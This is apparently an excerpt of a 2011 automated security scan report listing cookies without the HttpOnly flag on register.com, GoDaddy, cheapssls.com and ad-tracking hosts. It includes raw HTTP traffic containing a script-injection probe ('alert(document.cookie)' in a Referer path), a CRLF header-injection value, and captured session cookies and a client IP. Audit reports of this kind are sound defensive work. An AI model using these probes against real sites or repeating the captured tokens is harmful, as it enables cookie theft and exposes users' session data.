The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/thickbox.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BE922F8ED67410D61801BB428335AC70; Path=/; Domain=.register.com
HostName: atleuapp04.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:12 GMT
ETag: "1256c1-254b-4aba016c57900"
Accept-Ranges: bytes
Content-Length: 9547
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=af2d54c7f076f956f2dbdb3dbd2252bb34fb6f4d2b0d40564e629da2286023f2bc9f06c5948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

var tb_pathToImage="/imgs/global/loadingAnimation.gif";$(document).ready(function(){tb_init('a.thickbox, area.thickbox, input.thickbox');imgLoader=new Image();imgLoader.src=tb_pathToImage;$('.thickbo
...[SNIP]...

11. Cookie without HttpOnly flag set
There are 98 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



11.1. http://img.godaddy.com/image.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://img.godaddy.com
Path:   /image.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.aspx?sitename=www.godaddy.com&server=M1PWCORPWEB109&shopper=46215684&privatelabelid=1&status=200&rand=0.781776874690213&page=%2fssl%2fssl-certificates.aspx&split=24 HTTP/1.1
Host: img.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/03/2011 21:32:13&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:59; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pagecount=3; domain=.godaddy.com; path=/
Set-Cookie: fb_pagecount=3; path=/
Set-Cookie: actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
Set-Cookie: fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
Set-Cookie: app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
Set-Cookie: fb_session=S_TOUCH=09/03/2011 21:49:36&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
Set-Cookie: isc="; domain=.godaddy.com; path=/
Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:36 GMT; path=/
Set-Cookie: traffic=; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sat, 03 Sep 2011 21:49:36 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

11.2. http://img.godaddy.com/pageevents.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://img.godaddy.com
Path:   /pageevents.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pageevents.aspx?page_name=/ssl/ssl-certificates.aspx&ci=15014&eventtype=&ciimpressions=&usrin=&r=0.6363521805033088&comview=0 HTTP/1.1
Host: img.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/03/2011 21:32:13&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:59; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pagecount=15; domain=.godaddy.com; path=/
Set-Cookie: fb_pagecount=15; path=/
Set-Cookie: actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
Set-Cookie: fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
Set-Cookie: app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
Set-Cookie: fb_session=S_TOUCH=09/03/2011 21:49:49&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
Set-Cookie: isc="; domain=.godaddy.com; path=/
Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:50 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sat, 03 Sep 2011 21:49:50 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

11.3. http://login.dotomi.com/ucm/UCMController

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/ HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:42 GMT
X-Name: dmc-s09
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=230900890276886667$0$2054424934; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
Set-Cookie: DotomiSession_2304=2_270600892638176047$230900890276886667$2054424934$1315085562782; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUFRLZ3hua1xARWZBXAICW0dLSEFdZWBcemhkUH5RIgFAaV0%3D; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
Set-Cookie: DotomiRR2304=-1$4$1$-1$1$1$; Domain=.dotomi.com; Expires=Sun, 04-Sep-2011 21:32:42 GMT; Path=/
Content-Type: text/html
Content-Length: 1573

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

11.4. http://www.cheapssls.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cheapssls.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST / HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 3791
Cache-Control: max-age=0
Origin: http://www.cheapssls.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKYQY9kNoc4OMitTj
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.16.9.1315085525172; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

------WebKitFormBoundaryKYQY9kNoc4OMitTj
Content-Disposition: form-data; name="result_ids"

cart_status,wish_list
------WebKitFormBoundaryKYQY9kNoc4OMitTj
Content-Disposition: form-data; name="re
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:43:49 GMT
Location: http://www.cheapssls.com/index.php?dispatch=checkout.cart
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=oimsl5irn8eq044otel7tsq8g5; expires=Sat, 17-Sep-2011 21:43:49 GMT; path=/; domain=.cheapssls.com
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:43:49 GMT
Content-Length: 180

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.cheapssls.com/index.php?dispatch=checkout.cart">here</a></body>

11.5. http://www.cheapssls.com/index.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?dispatch=checkout.cart HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.16.9.1315085525172; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:43:50 GMT
Location: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=tt1a563t87rk9ibbpnpq0ptvm4; expires=Sat, 17-Sep-2011 21:43:50 GMT; path=/; domain=.cheapssls.com
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:43:49 GMT
Content-Length: 181

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.cheapssls.com/index.php?dispatch=checkout.cart">here</a></body>

11.6. http://www.register.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.register.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:31:33 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 30110
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...

11.7. http://www.register.com/domain/searchresults.rcmx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.register.com
Path:   /domain/searchresults.rcmx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:39:08 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=FC623F2DB25506910A73E866C7ED4DCB.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=9f156b13a4f431e8f00ccda3b691d1c601a75911468e3f0e4e629e11286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 31307
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...

11.8. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1429123&id=725544&id=74894&id=547417&id=119282&t=2 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: bh="b!!!#I!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!-?2!!!!-=38n'!!-O3!!!!*=38n'!!1SP!!!!#=38n,!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!itb!!!!%=1j[w!!vRq!!!!$=1j[w!!vRr!!!!$=1j[w!!vRw!!!!$=1j[w!!vRx!!!!$=1j[w!!vRy!!!!$=1j[w!#!,g!!!!$=1j[w!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0L2!!!!%=1Cp-!#0fU!!!!#=1j[w!#0fW!!!!#=1j[w!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#44f!!!!$=1j[w!#44h!!!!$=1j[w!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!$=1j[w!#MTH!!!!$=1j[w!#MTI!!!!$=1j[w!#MTJ!!!!$=1j[w!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#U5q!!!!#=09!!!#UDP!!!!$=1j[w!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!$=1j[w!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!'=/<(I!#g<y!!!!%=38n'!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tn2!!!!$=1j[w!#trp!!!!-=38n'!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!$=1j[w!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!$=1j[w!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!#=1D5@!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$,0h!!!!$=2Z2#!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!%=1D5C!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?tC!!!!#=38n'"; ih="b!!!!(!->h]!!!!#=/XuQ!0eUs!!!!#=1F/L!34fN!!!!#=/b4V!34fX!!!!#=/b4X!3DVF!!!!#=1F/N"; BX=8d7n6ot73ufk2&b=4&s=8m&t=219; 
pv1="b!!!!#!$'!L!$5*F!$kY3!3DVF!%JP7!!!!$!?5%!'2po7!?Q8(!'RQt~~~~~~~=1F/N=3CT*!!!(["; uid=uid=1071eb2c-d4cd-11e0-892f-78e7d1f5079e&_hmacv=1&_salt=321185080&_keyid=k1&_hmac=d75501ec81bb906d515b301e794922b4d10045fa

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 14:43:58 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#N!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!-?2!!!!-=38n'!!-C,!!!!$=3BC@!!-O3!!!!*=38n'!!1SP!!!!#=38n,!!3O?!!!!$=3BC@!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!itb!!!!%=1j[w!!pf4!!!!$=3BC@!!vRq!!!!$=1j[w!!vRr!!!!$=1j[w!!vRw!!!!$=1j[w!!vRx!!!!$=1j[w!!vRy!!!!$=1j[w!#!,g!!!!$=1j[w!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0L2!!!!%=1Cp-!#0fU!!!!#=1j[w!#0fW!!!!#=1j[w!#2Gj!!!!$=3BC@!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#44f!!!!$=1j[w!#44h!!!!$=1j[w!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!$=1j[w!#MTH!!!!$=1j[w!#MTI!!!!$=1j[w!#MTJ!!!!$=1j[w!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#U5q!!!!#=09!!!#UDP!!!!$=1j[w!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!$=1j[w!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!'=/<(I!#g<y!!!!%=38n'!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tn2!!!!$=1j[w!#trp!!!!-=38n'!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!$=1j[w!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!$=1j[w!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#